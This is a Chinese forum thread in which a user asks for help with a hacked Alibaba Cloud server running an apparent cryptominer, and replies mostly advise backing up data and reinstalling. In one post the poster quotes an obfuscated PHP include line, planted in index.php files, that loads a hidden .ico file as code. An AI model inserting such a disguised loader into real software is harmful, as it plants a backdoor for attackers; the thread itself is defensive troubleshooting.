这是一个创建于 2450 天前的主题,其中的信息可能已经有所发展或是发生改变。
实在没办法了,找了阿里云的技术支持还是搞不定,希望大家帮忙 看看 top 的占用
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2162 www-data 20 0 44796 2628 468 S 51.8 0.3 1:02.34 xxq6862
 | 1 CivAx 2019-01-30 10:25:00 +08:00 既然被跑满了,又能抓到 PID,为啥不直接 kill -9 ? |
 | 2 liuchang8877 OP 没用的,有定时任务应该,kill 掉后还是会重启 已经从参考这个做了,还是不行,没找到它的定时任务 https://blog.csdn.net/zzf1510711060/article/details/83015700 |
 | 3 ThirdFlame 2019-01-30 10:28:50 +08:00 /etc/crontab 查看一下 |
 | 4 westoy 2019-01-30 10:28:50 +08:00  1 先找个做安全的查查系统日志和程序日志, 看看是怎么被日的 再把数据和程序备份下, 如果问题出在程序上, 修正之 重做系统 重新导入数据和安装程序 不要试图现在这个系统修修补补继续用, 搞这个的都后多重后手防止被杀的, 你查二三重马的成本比重做高多了 |
 | 5 PureWhiteWu 2019-01-30 10:30:02 +08:00 直接重装系统啊。。。。 |
 | 6 egen 2019-01-30 10:30:52 +08:00 既然可以放个挖坑就不能顺手放个后门?清空重来吧,不然真过年了 |
| 7 CivAx 2019-01-30 10:31:27 +08:00 @liuchang8877 #2 要不你给一下登录信息我帮你上去看看吧……(正好摸鱼 |
 | 8 AstroProfundis 2019-01-30 10:33:29 +08:00 1 备份数据 开一台新的 ecs 部署干净环境 改强密码 /证书登录&检查应用的安全漏洞 导入备份的数据 改访问(域名、ip 之类)地址 旧 ecs 关机,观察没问题之后销毁旧 ecs |
 | 9 zhoulouzi 2019-01-30 10:34:41 +08:00 不清楚 Aliyun ECS 怎么跑的, 但是类似之前 kubernetes 有一个 CVE-2018-1002105 的 API 安全漏洞,也是会被远程攻击,在容器里跑挖矿程序, 你可以相同思路看看你的 docker 的 API 是不是未授权就暴露出来了 |
| 10 liuchang8877 OP 哎,不想清空从来呀就是,成本有点高,三套程序,加上 https 证书什么的,一弄就是一天,阿里云上都做了快照,数据再备份下,郁闷。 |
| 11 liuchang8877 OP 这是什么玩法?每个目录下给我塞了一个 index.php 文件,引入了一个远程库? <?php /*fb6ae*/ @include "\057var\057www\057htm\154/mo\144ule\163/im\141ge/\164est\163/.2\066a24\067ab.\151co"; /*fb6ae*/ |
 | 12 msg7086 2019-01-30 10:47:44 +08:00 备份数据重装不就得了。清理病毒什么的就不要多想了…… |
| 13 liuchang8877 OP 只能重装了,奋战.... |
 | 14 goodryb 2019-01-30 12:17:40 +08:00 如果由之前的快照,直接回滚之前的快照即可。 如果之前没有快照,建议对现在系统做手动快照。完成后重置系统,然后部署基础环境,挂载前面创建的快照,把数据拷贝过去。 快照是个好东西,一定要开起来 |
 | 15 ccc008 2019-01-30 12:37:50 +08:00 @liuchang8877 #10 你慢慢分析查杀病毒。1 天都搞不定的。 |
 | 16 cpdyj0 2019-01-30 12:44:09 +08:00 via Android 备份文件,重装系统…最简单粗暴但却有效的办法… |
 | 17 DANG 2019-01-30 12:49:53 +08:00 proc 下根据 pid 找文件路径删文件杀进程 crontab 里看定时任务里有没有脚本网址,有的话下载下来看看都干啥了。然后删除任务。 这种攻击都是服务器有漏洞导致的,建议关闭类似 8088 这样的危险端口。最主要的还是找到计划任务的那个脚本 |
 | 18 yuikns 2019-01-30 12:49:56 +08:00 人家不仅能装 crontab,还能给你装各种启动和后台,还能篡改你的系统命令。 还是重装吧。 |
 | 19 jay4497 2019-01-30 13:53:28 +08:00 1 |
| 20 liuchang8877 OP @jay4497 多谢,我给这个也删了试试 |
 | 21 RubyJack 2019-01-31 09:49:08 +08:00 根除或者 cgroup 限制 |
Select Language